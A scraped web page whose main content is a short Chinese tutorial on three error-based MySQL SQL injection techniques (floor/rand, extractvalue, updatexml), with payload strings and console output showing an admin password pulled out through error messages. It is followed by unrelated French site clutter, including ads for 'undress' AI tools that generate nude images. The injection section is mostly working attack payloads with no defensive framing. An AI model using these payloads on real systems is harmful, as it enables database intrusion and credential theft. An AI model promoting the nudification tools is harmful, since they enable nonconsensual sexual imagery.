mysql3种报错模式注入_MySQL
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by...
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
请看 ( http://www.yuefengqing.com/ )
2、ExtractValue
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
AI Hentai Generator
Générez AI Hentai gratuitement.
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Sujets chauds
1359
52
À quoi sert le mode Ne pas déranger de WeChat ?
Feb 23, 2024 pm 10:48 PM
Que signifie le mode Ne pas déranger de WeChat ? De nos jours, avec la popularité des smartphones et le développement rapide de l'Internet mobile, les plateformes de médias sociaux sont devenues un élément indispensable de la vie quotidienne des gens. WeChat est l’une des plateformes de médias sociaux les plus populaires en Chine, et presque tout le monde possède un compte WeChat. Nous pouvons communiquer avec nos amis, notre famille et nos collègues en temps réel via WeChat, partager des moments de notre vie et comprendre la situation actuelle de chacun. Cependant, à notre époque, nous sommes également inévitablement confrontés aux problèmes de surcharge d'informations et de fuite de la vie privée, en particulier pour ceux qui ont besoin de se concentrer ou de se concentrer.
A quoi sert le mode veille sur iPhone ?
Nov 04, 2023 am 11:13 AM
Les appareils iOS sont depuis longtemps capables de suivre vos habitudes de sommeil et bien plus encore grâce à l'application Santé. Mais n’est-ce pas ennuyeux d’être dérangé par des notifications pendant que vous dormez ? Ces notifications peuvent ne pas être pertinentes et donc perturber vos habitudes de sommeil. Bien que le mode Ne pas déranger soit un excellent moyen d'éviter les distractions pendant votre sommeil, il peut vous faire manquer des appels et des messages importants que vous recevez pendant la nuit. Heureusement, c'est là qu'intervient le mode veille. Apprenons-en plus à ce sujet et comment l'utiliser sur iPhone. Quel rôle joue le mode veille sur l'iPhone ? Le mode veille est un mode de concentration dédié dans iOS qui est automatiquement activé en fonction de votre horaire de sommeil dans l'application « Santé ». Cela vous aide à définir une alarme, puis
Le mode Ne pas déranger ne fonctionne pas sur iPhone : correctif
Apr 24, 2024 pm 04:50 PM
Même répondre à des appels en mode Ne pas déranger peut être une expérience très ennuyeuse. Comme son nom l'indique, le mode Ne pas déranger désactive toutes les notifications d'appels entrants et les alertes provenant d'e-mails, de messages, etc. Vous pouvez suivre ces ensembles de solutions pour résoudre ce problème. Correctif 1 – Activer le mode de mise au point Activez le mode de mise au point sur votre téléphone. Étape 1 – Faites glisser votre doigt depuis le haut pour accéder au Centre de contrôle. Étape 2 – Ensuite, activez le « Mode Focus » sur votre téléphone. Le mode Focus active le mode Ne pas déranger sur votre téléphone. Aucune alerte d’appel entrant n’apparaîtra sur votre téléphone. Correctif 2 – Modifier les paramètres du mode de mise au point S'il y a des problèmes dans les paramètres du mode de mise au point, vous devez les résoudre. Étape 1 – Ouvrez la fenêtre des paramètres de votre iPhone. Étape 2 – Ensuite, activez les paramètres du mode Focus
Que signifie le mode epc+o ?
Nov 09, 2022 am 10:54 AM
Le modèle epc+o fait référence au cadre contractuel général qui intègre la conception, l'approvisionnement, etc. Il s'agit de certains liens opérationnels dérivés de l'epc ; c'est-à-dire que pendant la période de construction, l'entrepreneur général ne doit pas seulement entreprendre des tâches de conception au sens traditionnel du terme. De plus, il doit également entreprendre toutes les tâches de maintenance pendant la période d'exploitation. Ce modèle peut grandement améliorer l'efficacité opérationnelle de nombreux projets et réduire rapidement les coûts d'exploitation.
iPhone 15 Pro : Comment se débarrasser du symbole du mode silencieux dans la barre d'état
Sep 24, 2023 pm 10:01 PM
Sur les modèles iPhone 15 Pro et iPhone 15 Pro Max, Apple a introduit un bouton d'action physiquement programmable qui remplace le traditionnel interrupteur sonnerie/silencieux au-dessus des boutons de volume. Le bouton d'action peut être programmé pour exécuter plusieurs fonctions différentes, mais la possibilité de basculer entre les modes silencieux et sonnerie n'a pas disparu. Par défaut, un appui long sur le bouton d'action mettra l'appareil sous silence et le retour tactile du bouton clignotera trois fois. Les deux modèles d'iPhone 15 Pro afficheront un symbole de cloche barrée à côté de l'heure dans la barre d'état pour indiquer que le mode silencieux/silencieux est activé, et il le restera jusqu'à ce que vous appuyiez à nouveau longuement sur le bouton Action pour réactiver l'appareil. Si vous préférez mettre votre iPhone en mode silencieux
Comment quitter le mode S sous Windows 10/11
Aug 03, 2023 pm 08:17 PM
Windows en mode S est conçu pour offrir une sécurité et des performances améliorées en autorisant uniquement l'installation d'applications à partir du Microsoft Store. Bien que cette fonctionnalité aide à prévenir les logiciels malveillants et à garantir un environnement informatique sécurisé, elle peut limiter les utilisateurs souhaitant installer des applications à partir de sources autres que le Microsoft Store. Si vous vous trouvez dans cette situation et que vous vous demandez sans cesse comment quitter le mode S sous Windows 10/11, alors vous êtes au bon endroit car nous vous expliquerons comment quitter le mode S sous Windows 10/11. en utilisant deux méthodes différentes, les étapes vers le mode S vous permettent de profiter de la liberté d'installer des applications où que vous soyez. Découvrez comment quitter le mode S sous Windows
Guide d'utilisation du mode veille dans iOS 17
Aug 22, 2023 pm 04:01 PM
Le mode veille arrive sur iPhone avec iOS17, et ce guide vise à vous montrer comment utiliser cette fonctionnalité sur votre iPhone. Le mode veille est une fonctionnalité révolutionnaire qui transforme l’iPhone en un écran intelligent dynamique et toujours actif. Lorsque votre iPhone est posé horizontalement sur le côté pendant le chargement, il active le mode veille. Ce mode présente magnifiquement une multitude de widgets utiles, notamment l'heure actuelle, les mises à jour de la météo locale, un diaporama de vos photos préférées et même des commandes de lecture de musique. Un avantage significatif de ce mode est sa capacité à afficher des notifications, permettant aux utilisateurs de les visualiser et d'interagir avec elles sans avoir à réveiller complètement leur iPhone. Comment utiliser le mode veille Pour que le mode veille fonctionne correctement, votre iPhone doit être en cours d'exécution.
Comment activer le « Mode sombre Notepad++ » et le « Thème sombre Notepad++ » ?
Oct 27, 2023 pm 11:17 PM
Le mode sombre de Notepad++ v8.0 n'a pas de paramètres, Notepad++ est l'éditeur de texte le plus utile. Chaque application exécutée sur Windows 10 prend en charge le mode sombre. Vous pouvez nommer des navigateurs Web tels que Chrome, Firefox et Microsoft Edge. Si vous travaillez sur Notepad++, le fond blanc par défaut peut vous faire mal aux yeux. Les développeurs ont ajouté le mode sombre à la version 8 de Notepad++, voici comment l'activer. Activer le Bloc-notes pour Windows 11/10 ++ Mode sombre Lancez le Bloc-notes ++ Cliquez sur "Paramètres" > "Préférences" > "Mode sombre" Sélectionnez "Activer le mode sombre" pour redémarrer le Bloc-notes
